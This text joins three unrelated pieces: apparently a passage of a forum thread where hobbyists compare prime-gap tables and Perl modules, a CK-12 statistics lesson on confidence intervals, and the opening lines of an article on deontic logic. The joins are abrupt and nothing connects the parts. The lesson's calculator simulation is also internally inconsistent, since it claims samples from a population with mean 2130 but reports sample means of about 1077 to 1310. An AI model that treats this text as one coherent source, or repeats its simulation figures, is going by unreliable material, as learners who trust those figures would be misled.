250508 50000000000011356541 50000000000011356949 408
304099 50000000000013792623 50000000000013793043 420
354501 50000000000016067159 50000000000016067579 420
365911 50000000000016590869 50000000000016591277 408
369508 50000000000016751999 50000000000016752431 432
389618 50000000000017667927 50000000000017668379 452
390675 50000000000017715717 50000000000017716137 420
392445 50000000000017794781 50000000000017795187 406
392640 50000000000017803641 50000000000017804069 428
395579 50000000000017938281 50000000000017938691 410
398647 50000000000018081141 50000000000018081561 420
410892 50000000000018637337 50000000000018637749 412
421815 50000000000019136829 50000000000019137261 432
424822 50000000000019274423 50000000000019274831 408
433663 50000000000019672697 50000000000019673181 484
458278 50000000000020787267 50000000000020787671 404
458609 50000000000020801897 50000000000020802317 420
478131 50000000000021687383 50000000000021687797 414
491265 50000000000022280321 50000000000022280787 466
496565 50000000000022518561 50000000000022519037 476
501250 50000000000022735853 50000000000022736253 400
508640 50000000000023075153 50000000000023075669 516
516120 50000000000023416289 50000000000023416691 402
519705 50000000000023580951 50000000000023581367 416
536596 50000000000024340619 50000000000024341129 510
537467 50000000000024378443 50000000000024378879 436
539029 50000000000024448317 50000000000024448779 462
589370 50000000000026733123 50000000000026733563 440
598449 50000000000027141153 50000000000027141591 438
624806 50000000000028331049 50000000000028331537 488
629368 50000000000028537841 50000000000028538267 426
632284 50000000000028673289 50000000000028673747 458
649090 50000000000029444103 50000000000029444507 404
665095 50000000000030174551 50000000000030174989 438
668424 50000000000030328401 50000000000030328803 402
681485 50000000000030913853 50000000000030914259 406
690803 50000000000031334291 50000000000031334699 408
703878 50000000000031928487 50000000000031928901 414
722278 50000000000032770277 50000000000032770689 412
733638 50000000000033284319 50000000000033284727 408
737072 50000000000033442241 50000000000033442731 490
743547 50000000000033735867 50000000000033736283 416
765778 50000000000034739901 50000000000034740479 578
766917 50000000000034791089 50000000000034791491 402
773953 50000000000035112827 50000000000035113253 426
774016 50000000000035116127 50000000000035116553 426
831195 50000000000037712319 50000000000037712733 414
837834 50000000000038012807 50000000000038013357 550
852115 50000000000038651469 50000000000038651891 422
888621 50000000000040311239 50000000000040311681 442
890510 50000000000040396841 50000000000040397261 420
903100 50000000000040962369 50000000000040962813 444
908429 50000000000041205581 50000000000041206013 432
912511 50000000000041391719 50000000000041392151 432
913646 50000000000041441577 50000000000041442051 474
956618 50000000000043377591 50000000000043378041 450
961002 50000000000043576733 50000000000043577163 430
961491 50000000000043598577 50000000000043598993 416
962494 50000000000043643427 50000000000043643871 444
999780 50000000000045334157 50000000000045334557 400
------
4657132 50000000000211284873 50000000000211285473 600
------
5621202 50000000000255031019 50000000000255031653 634
------
5946444 50000000000269759343 50000000000269760033 690
Last fiddled with by robert44444uk on 2019-12-22 at 15:53
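[The scan the posters describe — walk consecutive primes and record any gap at or above a threshold — can be sketched in Python. The posters actually used Perl's Math::Prime::Util; the helper names and the Miller-Rabin primality test below are illustrative, not from the thread.]

```python
def is_prime(n):
    """Deterministic Miller-Rabin; the first 12 primes as bases are
    known to be sufficient for all n < 3.3 * 10**24."""
    if n < 2:
        return False
    bases = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    for p in bases:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def gaps_at_least(start, min_gap, count):
    """Return (p, q, q - p) for the first `count` pairs of consecutive
    primes p < q at or above `start` whose gap is >= min_gap."""
    p = start
    while not is_prime(p):  # advance to the first prime >= start
        p += 1
    found = []
    while len(found) < count:
        q = p + 1
        while not is_prime(q):  # next prime after p
            q += 1
        if q - p >= min_gap:
            found.append((p, q, q - p))
        p = q
    return found

# small demo: the first gap of at least 20 above 100
print(gaps_at_least(100, 20, 1))  # -> [(887, 907, 20)]
```

A dedicated library sieve (as in Math::Prime::Util's prime iterators) is far faster than testing every candidate individually, which is the point robert44444uk makes about the Perl timings.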
2019-12-22, 15:56 #29
storm5510
Random Account
Aug 2009
U.S.A.
1804₁₀ Posts
Quote:
Originally Posted by robert44444uk ...The first few gaps >400, 1st column is the nth gap after 5e19. There were no gaps >=600
I compared what you have here with what I have. I was able to match the first six of yours. I will never be able to run as fast as yours. At least, it is accurate.
I downloaded and installed Strawberry and looked at some of the examples. I wish it had a really good front-end for code writing.
2019-12-23, 09:01 #30
robert44444uk
Jun 2003
Oxford, UK
2·7·137 Posts
Quote:
Originally Posted by storm5510 I compared what you have here with what I have. I was able to match the first six of yours. I will never be able to run as fast as yours. At least, it is accurate. I download and installed Strawberry and looked at some of the examples. I wish it had a really good front-end for code writing.
The first thing to do is to learn how to download additional modules via the command prompt using the CPAN command. Typical modules that I use are:
Timer::Runtime
Math::GMPz
Math::BigFloat
Math::Prime::Util
File::Slurp
With these you can really motor with prime finding and gaps
I learnt some of the basics through https://perlmaven.com/. There are other sites such as https://www.learn-perl.org . Specific enquiries on "how to" can be found through Google searches or through https://www.perlmonks.org/, but with the last of these, if you ask a question, they get pretty angry if it is something you could have found through a search or by "learning by doing".
You can always adapt code you find in the Prime Search Group posts, which is what I do!
2019-12-24, 14:39 #31
storm5510
Random Account
Aug 2009
U.S.A.
2²·11·41 Posts
Quote:
Originally Posted by robert44444uk The first few gaps >400, 1st column is the nth gap after 5e19. Time elapsed for the first million gaps was 100 secs. There were no gaps >=600. The first gap at the 600 level is that following 50000000000211284873 [full gap table quoted in post #28 above; snipped here]
It looks like you started at 5e19. I never went that high. I suspect that if you were to put long-haul file I/O and configuration saving in your code, you would not get this sort of speed. One is always at the mercy of the OS. I wrote mine to save everything it finds.
I gave it a try. I was again able to match the first dozen of your results. Yours sort of threw me: you have the larger number on the right where mine is on the left.
Code:
50000000000000388119, 50000000000000387671, 448
50000000000001566087, 50000000000001565667, 420
50000000000002234463, 50000000000002234033, 430
50000000000002821617, 50000000000002821217, 400
50000000000003534279, 50000000000003533853, 426
50000000000003579723, 50000000000003579203, 520
50000000000004046373, 50000000000004045967, 406
50000000000004695321, 50000000000004694897, 424
50000000000004884101, 50000000000004883687, 414
50000000000004942409, 50000000000004941917, 492
50000000000005167941, 50000000000005167523, 418
50000000000006006681, 50000000000006006213, 468
Regarding Perl. This will be a work-in-progress for quite some time to come.
Last fiddled with by storm5510 on 2019-12-24 at 14:40
2019-12-24, 17:08 #32
storm5510
Random Account
Aug 2009
U.S.A.
2²·11·41 Posts
An addendum. I really jacked the numbers up. I think the correct expression would be 1e46. It is a "1" with 46 zeros behind it. Gaps over 1,000 are scarce even at this level. The largest I have seen in the data file is 1,292. The vast majority are from 500 to 800.
2019-12-24, 23:04 #33
storm5510
Random Account
Aug 2009
U.S.A.
2²·11·41 Posts
Quote:
Originally Posted by robert44444uk ...The smallest gap where we do not know the first instance is 1,432. The smallest prime we know that this gap exists is 84,218,359,021,503,505,748,941 but there are likely to be many smaller instances with this gap size. My best guess is that the smaller of the two primes that make up the first instance gap of length exactly 1,432 is less than 100,000,000,000,000,000,000...
I have found "an" instance of 1,432. I had to start at 1e51 to do it. Are there instances of this gap in lower primes? I would say yes. Finding it could be time consuming...
Code:
1000000000000000000000000000000000000000000001871691
1000000000000000000000000000000000000000000001873123
1432
At 1e49, I started seeing some gaps over 1,000, but not many. I simply kept adding zeros.
|
|
# 7.3: Confidence Intervals
Difficulty Level: At Grade. Created by: CK-12.
## Learning Objectives
• Calculate the mean of a sample as a point estimate of the population mean.
• Construct a confidence interval for a population mean based on a sample mean.
• Calculate a sample proportion as a point estimate of the population proportion.
• Construct a confidence interval for a population proportion based on a sample proportion.
• Calculate the margin of error for a point estimate as a function of sample mean or proportion and size.
• Understand the logic of confidence intervals, as well as the meaning of confidence level and confidence intervals.
## Introduction
The objective of inferential statistics is to use sample data to increase knowledge about the entire population. In this lesson, we will examine how to use samples to make estimates about the populations from which they came. We will also see how to determine how wide these estimates should be and how confident we should be about them.
### Confidence Intervals
Sampling distributions are the connecting link between the collection of data by unbiased random sampling and the process of drawing conclusions from the collected data. Results obtained from a survey can be reported as a point estimate. For example, a single sample mean is a point estimate, because this single number is used as a plausible value of the population mean. Keep in mind that some error is associated with this estimate: the true population mean may be larger or smaller than the sample mean. An alternative to reporting a point estimate is identifying a range of possible values the parameter might take, controlling the probability that the parameter is not lower than the lowest value in this range and not higher than the largest value. This range of possible values is known as a confidence interval. Associated with each confidence interval is a confidence level. This level indicates the level of assurance you have that the resulting confidence interval encloses the unknown population mean.
In a normal distribution, we know that 95% of the data will fall within two standard deviations of the mean. Another way of stating this is to say that we are confident that in 95% of samples taken, the sample statistics are within plus or minus two standard errors of the population parameter. As the confidence interval for a given statistic increases in length, the confidence level increases.
The selection of a confidence level for an interval determines the probability that the confidence interval produced will contain the true parameter value. Common choices for the confidence level are 90%, 95%, and 99%. These levels correspond to percentages of the area under the normal density curve. For example, a 95% confidence interval covers 95% of the normal curve, so the probability of observing a value outside of this area is less than 5%. Because the normal curve is symmetric, half of the 5% is in the left tail of the curve, and the other half is in the right tail of the curve. This means that 2.5% is in each tail.
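For readers without a graphing calculator, the 95%/2.5% areas quoted above can be checked directly from the standard normal CDF. A short sketch using Python's standard library (the variable names are illustrative):

```python
from statistics import NormalDist

nd = NormalDist()  # standard normal: mean 0, standard deviation 1
central_area = nd.cdf(1.96) - nd.cdf(-1.96)  # area between -1.96 and +1.96
right_tail = 1 - nd.cdf(1.96)                # area in one tail

print(round(central_area, 3), round(right_tail, 3))  # -> 0.95 0.025
```

By symmetry the left tail carries the same 2.5%, which is why the two tails together account for the 5% outside a 95% interval.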
The graph shown above was made using a TI-83 graphing calculator and shows a normal distribution curve for a set of data for which \begin{align*}\mu=50\end{align*} and \begin{align*}\sigma=12\end{align*}. A 95% confidence interval for the standard normal distribution, then, is the interval (\begin{align*}-1.96\end{align*}, 1.96), since 95% of the area under the curve falls within this interval. The \begin{align*}\pm 1.96\end{align*} are the \begin{align*}z\end{align*}-scores that enclose the given area under the curve. For a normal distribution, the margin of error is the amount that is added to and subtracted from the mean to construct the confidence interval. For a 95% confidence interval, the margin of error is \begin{align*}1.96\sigma\end{align*}. (Note that previously we said that 95% of the data in a normal distribution falls within \begin{align*}\pm 2\end{align*} standard deviations of the mean. This was just an estimate, and for the remainder of this textbook, we'll assume that 95% of the data actually falls within \begin{align*}\pm 1.96\end{align*} standard deviations of the mean.)
The following is the derivation of the confidence interval for the population mean, \begin{align*}\mu\end{align*}. In it, \begin{align*}z_{\frac{\alpha}{2}}\end{align*} refers to the positive \begin{align*}z\end{align*}-score for a particular confidence interval. The Central Limit Theorem tells us that the distribution of \begin{align*}\bar{x}\end{align*} is normal, with a mean of \begin{align*}\mu\end{align*} and a standard deviation of \begin{align*}\frac{\sigma}{\sqrt{n}}\end{align*}. Consider the following:
\begin{align*}-z_{\frac{\alpha}{2}} < \frac{\bar{x}-\mu}{\frac{\sigma}{\sqrt{n}}} < z_{\frac{\alpha}{2}}\end{align*}
All values are known except for \begin{align*}\mu\end{align*}. Solving for this parameter, we have:
\begin{align*}&-\bar{x} - z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} < -\mu < -\bar{x} + z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}}\\ &\bar{x} + z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} > \mu > -z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} + \bar{x}\\ &\bar{x} + z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} > \mu > \bar{x} - z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}}\\ &\bar{x} - z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} < \mu < \bar{x} + z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}}\end{align*}
Another way to express this is: \begin{align*}\bar{x} \pm z_{\frac{\alpha}{2}}\left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}.
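The formula above can be sketched as a small Python function (the function name and sample values are illustrative, not from the text):

```python
from math import sqrt
from statistics import NormalDist

def mean_confidence_interval(xbar, sigma, n, level=0.95):
    """CI for a population mean with known sigma: xbar +/- z * sigma/sqrt(n)."""
    z = NormalDist().inv_cdf(0.5 + level / 2)  # positive z-score, about 1.96 at 95%
    margin = z * sigma / sqrt(n)               # the margin of error
    return xbar - margin, xbar + margin

# a sample of n = 60 with xbar = 110 and known sigma = 19, at 95% confidence
low, high = mean_confidence_interval(110, 19, 60)
print(round(low, 2), round(high, 2))  # -> 105.19 114.81
```

Raising the confidence level widens the interval (a larger z), while raising the sample size narrows it (a smaller standard error), exactly as the discussion below illustrates.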
On the Web
http://tinyurl.com/27syj3x This simulates confidence intervals for the mean of the population.
Example: Jenny randomly selected 60 muffins of a particular brand and had those muffins analyzed for the number of grams of fat that they each contained. Rather than reporting the sample mean (point estimate), she reported the confidence interval. Jenny reported that the number of grams of fat in each muffin is between 10.3 grams and 11.2 grams with 95% confidence.
In this example, the population mean is unknown. This number is fixed, not variable, and the sample means are variable, because the samples are random. If this is the case, does the confidence interval enclose this unknown true mean? Random samples lead to the formation of confidence intervals, some of which contain the fixed population mean and some of which do not. The most common mistake made by persons interpreting a confidence interval is claiming that once the interval has been constructed, there is a 95% probability that the population mean is found within the confidence interval. Even though the population mean is unknown, once the confidence interval is constructed, either the mean is within the confidence interval, or it is not. Hence, any probability statement about this particular confidence interval is inappropriate. In the above example, the confidence interval is from 10.3 to 11.2, and Jenny is using a 95% confidence level. The appropriate statement should refer to the method used to produce the confidence interval. Jenny should have stated that the method that produced the interval from 10.3 to 11.2 has a 0.95 probability of enclosing the population mean. This means if she did this procedure 100 times, 95 of the intervals produced would contain the population mean. The probability is attributed to the method, not to any particular confidence interval. The following diagram demonstrates how the confidence interval provides a range of plausible values for the population mean and that this interval may or may not capture the true population mean. If you formed 100 intervals in this manner, 95 of them would contain the population mean.
Example: The following questions are to be answered with reference to the above diagram.
a) Were all four sample means within \begin{align*}1.96 \frac{\sigma}{\sqrt{n}}\end{align*}, or \begin{align*}1.96\sigma_{\bar{x}}\end{align*}, of the population mean? Explain.
b) Did all four confidence intervals capture the population mean? Explain.
c) In general, what percentage of \begin{align*}\bar{x}'s\end{align*} should be within \begin{align*}1.96 \frac{\sigma}{\sqrt{n}}\end{align*} of the population mean?
d) In general, what percentage of the confidence intervals should contain the population mean?
a) The sample mean, \begin{align*}\bar{x}\end{align*}, for Sample 3 was not within \begin{align*}1.96\frac{\sigma}{\sqrt{n}}\end{align*} of the population mean. It did not fall within the vertical lines to the left and right of the population mean.
b) The confidence interval for Sample 3 did not enclose the population mean. This interval was just to the left of the population mean, which is denoted with the vertical line found in the middle of the sampling distribution of the sample means.
c) 95%
d) 95%
When the sample size is large \begin{align*}(n>30)\end{align*}, the confidence interval for the population mean is calculated as shown below:
\begin{align*}\bar{x}\pm z_{\frac{\alpha}{2}} \left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}, where \begin{align*}z_{\frac{\alpha}{2}}\end{align*} is 1.96 for a 95% confidence interval, 1.645 for a 90% confidence interval, and 2.576 for a 99% confidence interval.
Example: Julianne collects four samples of size 60 from a known population with a population standard deviation of 19 and a population mean of 110. Using the four samples, she calculates the four sample means to be:
\begin{align*}107 \qquad 112 \qquad 109 \qquad 115\end{align*}
a) For each sample, determine the 90% confidence interval.
b) Do all four confidence intervals enclose the population mean? Explain.
a) \begin{align*}&\bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}}\\ &107 \pm (1.645)(\frac{19}{\sqrt{60}}) && 112 \pm (1.645)(\frac{19}{\sqrt{60}}) && 109 \pm (1.645)(\frac{19}{\sqrt{60}})\\ &107 \pm 4.04 && 112 \pm 4.04 && 109 \pm 4.04\\ &\text{from} \ 102.96 \ \text{to} \ 111.04 && \text{from} \ 107.96 \ \text{to} \ 116.04 && \text{from} \ 104.96 \ \text{to} \ 113.04\end{align*}
\begin{align*}&\bar{x} \pm z\frac{\sigma}{\sqrt{n}}\\ &115 \pm (1.645)(\frac{19}{\sqrt{60}})\\ &115 \pm 4.04\\ &\text{from} \ 110.96 \ \text{to} \ 119.04\end{align*}
b) Three of the confidence intervals enclose the population mean. The interval from 110.96 to 119.04 does not enclose the population mean.
Technology Note: Simulation of Random Samples and Formation of Confidence Intervals on the TI-83/84 Calculator
Now it is time to use a graphing calculator to simulate the collection of three samples of sizes 30, 60, and 90, respectively. The three sample means will be calculated, as well as the three 95% confidence intervals. The samples will be collected from a population that displays a normal distribution, with a population standard deviation of 108 and a population mean of 2130. First, store the three samples in L1, L2, and L3, respectively, as shown below:
Store 'randNorm\begin{align*}(\mu,\sigma,n)\end{align*}' in L1. The sample size is \begin{align*}n=30\end{align*}. (randNorm, not randInt, draws from a normal distribution on the TI-83/84.)
Store 'randNorm\begin{align*}(\mu,\sigma,n)\end{align*}' in L2. The sample size is \begin{align*}n=60\end{align*}.
Store 'randNorm\begin{align*}(\mu,\sigma,n)\end{align*}' in L3. The sample size is \begin{align*}n=90\end{align*}.
The lists of numbers can be viewed by pressing [STAT][ENTER]. The next step is to calculate the mean of each of these samples.
To do this, first press [2ND][LIST] and go to the MATH menu. Next, select the 'mean(' command and press [2ND][L1][ENTER]. Repeat this process for L2 and L3.
Note that your confidence intervals will be different than the ones calculated below, because the random numbers generated by your calculator will be different, and thus, your means will be different. For us, the means of L1, L2, and L3 were 1309.6, 1171.1, and 1077.1, respectively, so the confidence intervals are as follows:
\begin{align*}& \bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}}\\ & 1309.6 \pm (1.96)(\frac{108}{\sqrt{30}}) && 1171.1 \pm (1.96)(\frac{108}{\sqrt{60}}) && 1077.1 \pm (1.96)(\frac{108}{\sqrt{90}})\\ & 1309.6 \pm 38.65 && 1171.1 \pm 27.33 && 1077.1 \pm 22.31\\ & \text{from} \ 1270.95 \ \text{to} \ 1348.25 && \text{from} \ 1143.77 \ \text{to} \ 1198.43 && \text{from} \ 1054.79 \ \text{to} \ 1099.41\end{align*}
As was expected, the value of \begin{align*}\bar{x}\end{align*} varied from one sample to the next. The other fact that was evident was that as the sample size increased, the length of the confidence interval became smaller, or decreased. This is because with the increase in sample size, you have more information, and thus, your estimate is more accurate, which leads to a narrower confidence interval.
In all of the examples shown above, you calculated the confidence intervals for the population mean using the formula \begin{align*}\bar{x} \pm z_{\frac{\alpha}{2}} \left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}. However, to use this formula, the population standard deviation \begin{align*}\sigma\end{align*} had to be known. If this value is unknown, and if the sample size is large \begin{align*}(n>30)\end{align*}, the population standard deviation can be replaced with the sample standard deviation. Thus, the formula \begin{align*}\bar{x} \pm z_{\frac{\alpha}{2}} \left ( \frac{s_x}{\sqrt{n}} \right )\end{align*} can be used as an interval estimator, or confidence interval. This formula is valid only for simple random samples. Since \begin{align*}z_{\frac{\alpha}{2}} \left ( \frac{s_x}{\sqrt{n}} \right )\end{align*} is the margin of error, a confidence interval can be thought of simply as: \begin{align*}\bar{x} \pm\end{align*} the margin of error.
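The large-sample variant, substituting the sample standard deviation for \begin{align*}\sigma\end{align*}, can be sketched the same way in Python (the data below are made up purely for illustration):

```python
from math import sqrt
from statistics import mean, stdev, NormalDist

def mean_ci_from_sample(data, level=0.95):
    """Large-sample CI: xbar +/- z * s_x/sqrt(n); valid for simple random
    samples with n > 30, using the sample standard deviation s_x."""
    n = len(data)
    z = NormalDist().inv_cdf(0.5 + level / 2)
    margin = z * stdev(data) / sqrt(n)   # margin of error with s_x replacing sigma
    return mean(data) - margin, mean(data) + margin

data = list(range(1, 41))  # a toy "sample" of n = 40 values
low, high = mean_ci_from_sample(data)
print(round(low, 2), round(high, 2))  # -> 16.88 24.12
```

For small samples the t-distribution, not the normal, is the appropriate reference, which is why the text restricts this shortcut to n > 30.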
Example: A committee set up to field-test questions from a provincial exam randomly selected grade 12 students to answer the test questions. The answers were graded, and the sample mean and sample standard deviation were calculated. Based on the results, the committee predicted that on the same exam, 9 times out of 10, grade 12 students would have an average score of within 3% of 65%.
a) Are you dealing with a 90%, 95%, or 99% confidence level?
b) What is the margin of error?
c) Calculate the confidence interval.
d) Explain the meaning of the confidence interval.
a) You are dealing with a 90% confidence level. This is indicated by 9 times out of 10.
b) The margin of error is 3%.
c) The confidence interval is \begin{align*}\bar{x} \pm\end{align*} the margin of error, or 62% to 68%.
d) There is a 0.90 probability that the method used to produce this interval from 62% to 68% results in a confidence interval that encloses the population mean (the true score for this provincial exam).
### Confidence Intervals for Hypotheses about Population Proportions
In estimating a parameter, we can use a point estimate or an interval estimate. The point estimate for the population proportion, \begin{align*}p\end{align*}, is \begin{align*}\hat{p}\end{align*}. We can also find interval estimates for this parameter. These intervals are based on the sampling distributions of \begin{align*}\hat{p}\end{align*}.
If we are interested in finding an interval estimate for the population proportion, the following two conditions must be satisfied:
1. We must have a random sample.
2. The sample size must be large enough (\begin{align*}n\hat{p}>10\end{align*} and \begin{align*}n(1-\hat{p})>10\end{align*}) that we can use the normal distribution as an approximation to the binomial distribution.
\begin{align*}\sqrt{\frac{p(1-p)}{n}}\end{align*} is the standard deviation of the distribution of sample proportions. The distribution of sample proportions is approximately normal, centered at the population proportion \begin{align*}p\end{align*}, with standard deviation \begin{align*}\sqrt{\frac{p(1-p)}{n}}\end{align*}.
Since we do not know the value of \begin{align*}p\end{align*}, we must replace it with \begin{align*}\hat{p}\end{align*}. We then have the standard error of the sample proportions, \begin{align*}\sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\end{align*}. If we are interested in a 95% confidence interval, using the Empirical Rule, we are saying that we want the difference between the sample proportion and the population proportion to be within 1.96 standard deviations.
That is, we want the following:
\begin{align*}&-1.96 \ \text{standard errors} < \hat{p}-p<1.96 \ \text{standard errors}\\ &-\hat{p}-1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}} < - p < -\hat{p} + 1.96 \sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\\ &\hat{p} + 1.96 \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} > p > \hat{p}-1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\\ &\hat{p} - 1.96 \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} < p < \hat{p}+1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\end{align*}
This is a 95% confidence interval for the population proportion. If we generalize for any confidence level, the confidence interval is as follows:
\begin{align*}\hat{p}-z_{\frac{\alpha}{2}}\sqrt{\frac{\hat{p}(1-\hat{p})}{n}} < p < \hat{p} + z_{\frac{\alpha}{2}} \sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\end{align*}
In other words, the confidence interval is \begin{align*}\hat{p} \pm z_{\frac{\alpha}{2}} \left ( \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} \right )\end{align*}. Remember that \begin{align*}z_{\frac{\alpha}{2}}\end{align*} refers to the positive \begin{align*}z\end{align*}-score for a particular confidence interval. Also, \begin{align*}\hat{p}\end{align*} is the sample proportion, and \begin{align*}n\end{align*} is the sample size. As before, the margin of error is \begin{align*}z_{\frac{\alpha}{2}} \left ( \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} \right )\end{align*}, and the confidence interval is \begin{align*}\hat{p}\pm\end{align*} the margin of error.
Example: A congressman is trying to decide whether to vote for a bill that would legalize gay marriage. He will decide to vote for the bill only if 70 percent of his constituents favor the bill. In a survey of 300 randomly selected voters, 224 (74.6%) indicated they would favor the bill. The congressman decides that he wants an estimate of the proportion of voters in the population who are likely to favor the bill. Construct a confidence interval for this population proportion.
Our sample proportion is 0.746, and our standard error of the proportion is 0.0251. We will construct a 95% confidence interval for the population proportion. Under the normal curve, 95% of the area is between \begin{align*}z = -1.96\end{align*} and \begin{align*}z=1.96\end{align*}. Thus, the confidence interval for this proportion would be:
\begin{align*}& 0.746 \pm (1.96)(0.0251)\\ & 0.697 < p < 0.795\end{align*}
With respect to the population proportion, we are 95% confident that the interval from 0.697 to 0.795 contains the population proportion. The population proportion is either in this interval, or it is not. When we say that this is a 95% confidence interval, we mean that if we took 100 samples, all of size \begin{align*}n\end{align*}, and constructed 95% confidence intervals for each of these samples, 95 out of the 100 confidence intervals we constructed would capture the population proportion, \begin{align*}p\end{align*}.
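The interval in this example can be reproduced with a short helper (the 0.746 and 0.0251 quoted above are rounded; keeping full precision shifts the endpoints very slightly):

```python
import math

def proportion_confidence_interval(successes, n, z=1.96):
    """p-hat +/- z * sqrt(p-hat(1 - p-hat)/n).

    Assumes a random sample with n*p-hat > 10 and n*(1 - p-hat) > 10."""
    p_hat = successes / n
    se = math.sqrt(p_hat * (1 - p_hat) / n)
    return p_hat - z * se, p_hat + z * se

# the congressman example: 224 of 300 randomly selected voters in favor
low, high = proportion_confidence_interval(224, 300)
# close to the 0.697 < p < 0.795 reported above; small differences
# come from rounding the standard error to 0.0251
```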
Example: A large grocery store has been recording data regarding the number of shoppers that use savings coupons at its outlet. Last year, it was reported that 77% of all shoppers used coupons, and 19 times out of 20, these results were considered to be accurate within 2.9%.
a) Are you dealing with a 90%, 95%, or 99% confidence level?
b) What is the margin of error?
c) Calculate the confidence interval.
d) Explain the meaning of the confidence interval.
a) The statement 19 times out of 20 indicates that you are dealing with a 95% confidence interval.
b) The results were accurate within 2.9%, so the margin of error is 0.029.
c) The confidence interval is simply \begin{align*}\hat{p} \pm\end{align*} the margin of error.
\begin{align*}77\%-2.9\%=74.1\% \qquad 77\%+2.9\%=79.9\%\end{align*}
Thus, the confidence interval is from 0.741 to 0.799.
d) The 95% confidence interval from 0.741 to 0.799 for the population proportion is an interval calculated from a sample by a method that has a 0.95 probability of capturing the population proportion.
On the Web
http://tinyurl.com/27syj3x This simulates confidence intervals for the population proportion.
http://tinyurl.com/28z97lr Explore how changing the confidence level and/or the sample size affects the length of the confidence interval.
## Lesson Summary
In this lesson, you learned that a sample mean is known as a point estimate, because this single number is used as a plausible value of the population mean. In addition to reporting a point estimate, you discovered how to calculate an interval of reasonable values based on the sample data. This interval estimator of the population mean is called the confidence interval. You can calculate this interval for the population mean by using the formula \begin{align*}\bar{x}\pm z_{\frac{\alpha}{2}} \left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}. The value of \begin{align*}z_{\frac{\alpha}{2}}\end{align*} is different for each confidence interval of 90%, 95%, and 99%. You also learned that the probability is attributed to the method used to calculate the confidence interval.
In addition, you learned that you calculate the confidence interval for a population proportion by using the formula \begin{align*}\hat{p} \pm z_{\frac{\alpha}{2}} \left ( \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} \right )\end{align*}.
## Points to Consider
• Does replacing \begin{align*}\sigma\end{align*} with \begin{align*}s\end{align*} change your chance of capturing the unknown population mean?
• Is there a way to increase the chance of capturing the unknown population mean?
For an explanation of the concept of confidence intervals (17.0), see kbower50, What are Confidence Intervals? (3:24).
For a description of the formula used to find confidence intervals for the mean (17.0), see mathguyzero, Statistics Confidence Interval Definition and Formula (1:26).
For an interactive demonstration of the relationship between margin of error, sample size, and confidence intervals (17.0), see wolframmathematica, Confidence Intervals: Confidence Level, Sample Size, and Margin of Error (0:16).
For an explanation on finding the sample size for a particular margin of error (17.0), see statslectures, Calculating Required Sample Size to Estimate Population Mean (2:18).
## Review Questions
1. In a local teaching district, a technology grant is available to teachers in order to install a cluster of four computers in their classrooms. From the 6,250 teachers in the district, 250 were randomly selected and asked if they felt that computers were an essential teaching tool for their classroom. Of those selected, 142 teachers felt that computers were an essential teaching tool.
1. Calculate a 99% confidence interval for the proportion of teachers who felt that computers are an essential teaching tool.
2. How could the survey be changed to narrow the confidence interval but to maintain the 99% confidence interval?
2. Josie followed the guidelines presented to her and conducted a binomial experiment. She did 300 trials and reported a sample proportion of 0.61.
1. Calculate the 90%, 95%, and 99% confidence intervals for this sample.
2. What did you notice about the confidence intervals as the confidence level increased? Offer an explanation for your findings.
3. If the population proportion were 0.58, would all three confidence intervals enclose it? Explain.
Keywords
Central Limit Theorem
The distribution of the sample mean approaches a normal distribution as the sample size increases.
Confidence interval
Range of possible values the parameter might take.
Confidence level
The probability that the method used to calculate the confidence interval will produce an interval that will enclose the population parameter.
Margin of error
The amount that is added to and subtracted from the mean to construct the confidence interval.
Parameter
Numerical descriptive measure of a population.
Point estimate
A single statistic, computed from sample data, that is used as a plausible value of the corresponding population parameter; for example, the sample mean serves as a point estimate of the population mean.
Sample means
The means of random samples drawn from a population; for sufficiently large samples, the sampling distribution of the sample means is approximately normal (bell-shaped).
Sample proportion
The fraction of a sample that has a given characteristic; for example, if a survey of 100 students gives 48 who approve of the dress code and 52 who disapprove, the sample proportion of approvals is 48%.
Sampling distributions
The sampling distribution is the probability distribution of the statistic.
Standard error
The standard error is also a function of the sample size. In other words, as the sample size increases, the standard error decreases, or the bigger the sample size, the more closely the samples will be clustered around the true value.
|
|
## Monday, March 24, 2008
Deontic logic is the field of logic that is concerned with obligation, permission, and related concepts. Alternatively, a deontic logic is a formal system that attempts to capture the essential logical features of these concepts. Typically, a deontic logic uses OA to mean it is obligatory that A, (or it ought to be (the case) that A), and PA to mean it is permitted (or permissible) that A. The term deontic is derived from the ancient Greek déon, meaning, roughly, that which is binding or proper.
History
Philosophers from the Indian Mimamsa school to those of Ancient Greece have remarked on the formal logical relations of deontic concepts. In his Elementa juris naturalis, Leibniz notes that the logical relations between the licitum, illicitum, debitum, and indifferens are equivalent to those between the possible, impossible, necessarium, and contingens, respectively.
Pre-History of Deontic Logic
